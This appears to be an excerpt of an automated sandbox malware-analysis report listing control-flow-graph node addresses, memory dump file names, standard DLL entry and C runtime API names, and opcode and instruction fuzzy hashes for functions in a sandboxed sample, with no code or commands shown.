                                                                                                                                                                                            control_flow_graph 3533 6c787e88-6c787e99 call 6c788630 3536 6c787eaa-6c787eb1 3533->3536 3537 6c787e9b-6c787ea1 3533->3537 3539 6c787ebd-6c787ed1 dllmain_raw 3536->3539 3540 6c787eb3-6c787eb6 3536->3540 3537->3536 3538 6c787ea3-6c787ea5 3537->3538 3541 6c787f83-6c787f92 3538->3541 3543 6c787f7a-6c787f81 3539->3543 3544 6c787ed7-6c787ee8 dllmain_crt_dispatch 3539->3544 3540->3539 3542 6c787eb8-6c787ebb 3540->3542 3545 6c787eee-6c787f00 call 6c787380 3542->3545 3543->3541 3544->3543 3544->3545 3548 6c787f29-6c787f2b 3545->3548 3549 6c787f02-6c787f04 3545->3549 3551 6c787f2d-6c787f30 3548->3551 3552 6c787f32-6c787f43 dllmain_crt_dispatch 3548->3552 3549->3548 3550 6c787f06-6c787f24 call 6c787380 call 6c787dd8 dllmain_raw 3549->3550 3550->3548 3551->3543 3551->3552 3552->3543 3554 6c787f45-6c787f77 dllmain_raw 3552->3554 3554->3543
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3136044242-0
                                                                                                                                                                                            • Opcode ID: 87cadc4d65266e6985ea89307ea9ca25262f41189b7d44011df05b00bd902e67
                                                                                                                                                                                            • Instruction ID: 3219fc177ab40acceef8cec4abb1e1cef2effe88d081af9386713f73c17f2a02
                                                                                                                                                                                            • Opcode Fuzzy Hash: 87cadc4d65266e6985ea89307ea9ca25262f41189b7d44011df05b00bd902e67
                                                                                                                                                                                            • Instruction Fuzzy Hash: 21219972F07155AFDB218E56CA44AAE3B79EF807D8F114135FA166BA10D3308D42DBE0

Control-flow Graph (graph image not reproduced)
APIs
• __RTC_Initialize.LIBCMT ref: 6C787D1E
  • Part of subcall function 6C78819B: InitializeSListHead.KERNEL32(6C812220,6C787D28,6C799A90,00000010,6C787CB9,?,?,?,6C787EE1,?,00000001,?,?,00000001,?,6C799AD8), ref: 6C7881A0
• ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C787D88
Memory Dump Source
• Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
• Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Yara matches
Similarity
• API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
• String ID:
• API String ID: 3231365870-0
• Opcode ID: 3147518013b2f75b636d19f13c410e6d232088f382e1eb769cde18b9a1c61410
• Instruction ID: 9b2adf686659f38833a91069674019c4616e35f162062f406a28a2a01055428e
• Opcode Fuzzy Hash: 3147518013b2f75b636d19f13c410e6d232088f382e1eb769cde18b9a1c61410
• Instruction Fuzzy Hash: F421A132747611AADB109BB4AB0E7ED77F09F1236CF20453AE76227FC2CB610148D6A5

Control-flow Graph (graph image not reproduced)
Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d02f5c6e32308cc4f0a1aea2ce176258fbaa470dab076608c8e8179c3e6432af
• Instruction ID: 220dd90ed0c803e652c4e736763d0e16469d2e5b4d2c53e0c4e082cd631d648a
• Opcode Fuzzy Hash: d02f5c6e32308cc4f0a1aea2ce176258fbaa470dab076608c8e8179c3e6432af
• Instruction Fuzzy Hash: 3F21D131A14205CFDB44DF79E99469BBBB3FB88300B20897AE415EB384DB34ED158B91

Control-flow Graph (graph image not reproduced)
Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4cb5dff04dc3d88807f010b886f1a8782fd98c6e355138515afdfaa261877ff
• Instruction ID: 2b9a84f6a4f0c56641b0f5f25aa130a33a2995bf5c002b4c4727ab668b43e7dc
• Opcode Fuzzy Hash: d4cb5dff04dc3d88807f010b886f1a8782fd98c6e355138515afdfaa261877ff
• Instruction Fuzzy Hash: C2014731E152549FCB02CB74CC90ACA3FB3EF87310B0548E6D105EB696C6345D1AD3A2

Control-flow Graph (graph image not reproduced)
Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a045435ae22cc4ed82cfc2161d0670d68d09d47a9f3e1febb32618b95dee88a1
• Instruction ID: 3b5e4ba097780265a042b06ee3d0d54b3942640879b579ee511547b511f0bd4c
• Opcode Fuzzy Hash: a045435ae22cc4ed82cfc2161d0670d68d09d47a9f3e1febb32618b95dee88a1
• Instruction Fuzzy Hash: 8C0145327461509BC7084A799DC4B57FFABBBC9310308C9B7A109CB26ACB38E9118291

Control-flow Graph (graph image not reproduced)
Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f0dc1f42c3a88a089df0363023267cb736dfd8f5c82d115af7342313a81097fd
• Instruction ID: a24b0969a12a46b6d797d97d9507839f292445613cf95c608e9817182321cfe1
• Opcode Fuzzy Hash: f0dc1f42c3a88a089df0363023267cb736dfd8f5c82d115af7342313a81097fd
• Instruction Fuzzy Hash: E5012472B285419BC3088E2AADD0692FBA6FFC531135CC5BBC009CBA14CB709815CA93

Control-flow Graph (graph image not reproduced)
Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80d06d0d122d6037169e5a8675f6f3ae400ca44612a8e09358e22cf44e2d87a8
• Instruction ID: 37613ca12080eeaf0b431674748d5fe85a19ce2238af9614a735d99de4c52110
• Opcode Fuzzy Hash: 80d06d0d122d6037169e5a8675f6f3ae400ca44612a8e09358e22cf44e2d87a8
• Instruction Fuzzy Hash: B4017621B461519BC30C4A3A5DC0667FEAFB7C8620344C933A509CB26ACF74E91182D0

Control-flow Graph (graph image not reproduced)
Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f6225d6b42d156651fa3730e4ba1cb0b49e181aa1517088e3d68ce89602808a8
• Instruction ID: 0a377232be7516ff214ee446e0c9386b4ec3878ebf48033f31a195b0f39858da
• Opcode Fuzzy Hash: f6225d6b42d156651fa3730e4ba1cb0b49e181aa1517088e3d68ce89602808a8
• Instruction Fuzzy Hash: A001F4332185A06FC306CA2DDC2489EFFA5EBC522170DC266E969C7646C334F8158BE0

Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 339634f3bfc794f73bc28db22ed99f535b69dd5c063081d024880be2e61fdc22
• Instruction ID: 7676f6b977ab64ad3b0f0edd1bfa12bcc29076ebdd3fdf1c9c365c91d45876c0
• Opcode Fuzzy Hash: 339634f3bfc794f73bc28db22ed99f535b69dd5c063081d024880be2e61fdc22
• Instruction Fuzzy Hash: 7201AD71714144ABC755CE39AC90A66BBE6FBC9210B18C5AAE109CB396CA60AC229B51

Control-flow Graph (figure placeholder; legend: Executed / Not Executed)
control_flow_graph 3838 17b1aa1-17b1ad6 3840 17b1adb-17b1af0 3838->3840 3841 17b229a-17b229f call 17b2861 3840->3841 3842 17b1af6-17b1b84 3840->3842 3843 17b22a5-17b22b7 3841->3843 3845 17b1b8d 3842->3845 3846 17b1b86-17b1b8b 3842->3846 3847 17b1b92 3845->3847 3846->3847 3847->3840
Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e4a88b7f817ef0f48746bc82e2b8c6929b3470f826f78e4bb48050ae33ea2fea
• Instruction ID: bec94ac6dc81fea609e824d3c954b4c8dfa324748fdf37302969acb4d8a8eab4
• Opcode Fuzzy Hash: e4a88b7f817ef0f48746bc82e2b8c6929b3470f826f78e4bb48050ae33ea2fea
• Instruction Fuzzy Hash: 54014231605344CFCB258B28DC84999BBA7EF8A32071849AAE4029B391CF30AC20CB52

Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4a7c9777c4e331b1f34eeaad2ace0a506433246cb224c8e107684a99d8118dd
• Instruction ID: 7ba1f944b4ecefa8c6647461fabbd844a769a3e1ef244c17b5e873724d0322e0
• Opcode Fuzzy Hash: d4a7c9777c4e331b1f34eeaad2ace0a506433246cb224c8e107684a99d8118dd
• Instruction Fuzzy Hash: 65F06270E14204EFCB44CFB5DD8569EBFF2EB99201F1585A6D805D7614F6348B119B41

Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 142e8cb47a402af7f8a1887a8147fa33db928a6c3bbc8e076c9d4712394f2021
• Instruction ID: 22af9b509380658288b421950ba67e8f1f9dae09d423f3ba3dad62c6bfe25213
• Opcode Fuzzy Hash: 142e8cb47a402af7f8a1887a8147fa33db928a6c3bbc8e076c9d4712394f2021
• Instruction Fuzzy Hash: E2F05E70E44308EFCB84DFB9998529EFFF2EB85201F20C5A6E545D3614E7349B118B81
Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 500f9f8d294cfb2e3b4ea7273d2a368ffb4ffc9d4553d49ff37371651649d79b
• Instruction ID: b8b8e8970139ab6425ba4b626a6e324491dce4959d051ada791597f0c81ed7d7
• Opcode Fuzzy Hash: 500f9f8d294cfb2e3b4ea7273d2a368ffb4ffc9d4553d49ff37371651649d79b
• Instruction Fuzzy Hash: 59E0DF32100450BFC712CE58DA4489AFFA5EB8531131AC252E449D721AC335E921CB90

Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 87b42c53596f13bf7b003dfe3c5583d9223fde8f571d0599ef9a777e48a2e47d
• Instruction ID: 731c495d4a3bafe1d844a89198e1a7cf61ab1bccc92c6d0c6e42686766a306d4
• Opcode Fuzzy Hash: 87b42c53596f13bf7b003dfe3c5583d9223fde8f571d0599ef9a777e48a2e47d
• Instruction Fuzzy Hash: 69D05E36605308DFC7249B60EC58468B771FF85366760456EE10B46691C736A826CF40

Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d84c2db59e460e9bd944caecec81f50dbc72542df4d996735ca52c29cfb8fe50
• Instruction ID: 6381f5291171f6c25ccd85bbfd040affe2d9b124fc95224b05e8cb90cf6425fd
• Opcode Fuzzy Hash: d84c2db59e460e9bd944caecec81f50dbc72542df4d996735ca52c29cfb8fe50
• Instruction Fuzzy Hash: 33E00974A01608CBCB14CFA5CA909DDFBF2EB8D221B649269D806A2354D635AE46CB21

Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de0dad515350b9cc55f7eaaa64db9d11cbd8855dfec02bb0f5af210f7dc26381
• Instruction ID: 7a2ce06e24e7fbfb755698808132cb9e906e07f61f62b08da288e877ccfc25e4
• Opcode Fuzzy Hash: de0dad515350b9cc55f7eaaa64db9d11cbd8855dfec02bb0f5af210f7dc26381
• Instruction Fuzzy Hash: FBD0A934210300DBC7608B30E94172AB3B2BB89300F11550AD14786BA0C230A0408E00

Memory Dump Source
• Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 670b845084956f01fbde49b3d4a69d95575d808eace86107157665aed00b3f48
• Instruction ID: eee42e69a645e8050d5a3a0a921f6ae0de28d7cf5dc474edfe976869f73d8325
• Opcode Fuzzy Hash: 670b845084956f01fbde49b3d4a69d95575d808eace86107157665aed00b3f48
• Instruction Fuzzy Hash: 4CC02B30B200004AC384E634E8C8ACCF271FF441C0750481B64003F0B9CF208E014841